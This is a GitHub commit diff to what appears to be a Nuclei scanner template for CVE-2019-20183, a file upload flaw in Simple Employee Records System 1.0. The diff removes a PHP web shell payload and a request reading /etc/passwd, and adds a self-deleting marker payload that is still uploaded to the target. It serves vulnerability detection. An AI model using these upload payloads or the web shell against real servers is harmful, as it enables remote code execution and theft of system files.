Dhiyaneshwaran
GitHub
commit
cb6ff0928c
|
|
@ -2,7 +2,7 @@ id: CVE-2019-20183
|
|||
|
||||
info:
|
||||
name: Simple Employee Records System 1.0 - Unrestricted File Upload
|
||||
author: pikpikcu
|
||||
author: pikpikcu,j4vaovo
|
||||
severity: high
|
||||
description: |
|
||||
Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution.
|
||||
|
|
@ -17,7 +17,7 @@ info:
|
|||
cwe-id: CWE-434
|
||||
cpe: cpe:2.3:a:employee_records_system_project:employee_records_system:*:*:*:*:*:*:*:*
|
||||
epss-score: 0.02791
|
||||
tags: edb,cve,cve2019,rce,intrusive,fileupload
|
||||
tags: edb,cve,cve2019,rce,fileupload,intrusive
|
||||
metadata:
|
||||
max-request: 2
|
||||
|
||||
|
|
@ -35,13 +35,13 @@ http:
|
|||
Content-Type: image/png
|
||||
|
||||
<?php
|
||||
$cmd=$_GET['cmd'];
|
||||
system($cmd);
|
||||
echo md5('CVE-2019-20183');
|
||||
unlink(__FILE__);
|
||||
?>
|
||||
-----------------------------5825462663702204104870787337--
|
||||
|
||||
- |
|
||||
GET /uploads/employees_ids/{{endpoint}}?cmd=cat%20/etc/passwd HTTP/1.1
|
||||
GET /uploads/employees_ids/{{endpoint}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
|
|
@ -53,10 +53,7 @@ http:
|
|||
- '(?:[a-zA-Z0-9+\/])*_poc.php'
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/06/17
|
||||
- type: word
|
||||
part: body_2
|
||||
words:
|
||||
- "1ad0d710225c472cb7396b3c1d97e4dd"
|
||||
|
|
|
|||
Loading…
Reference in New Issue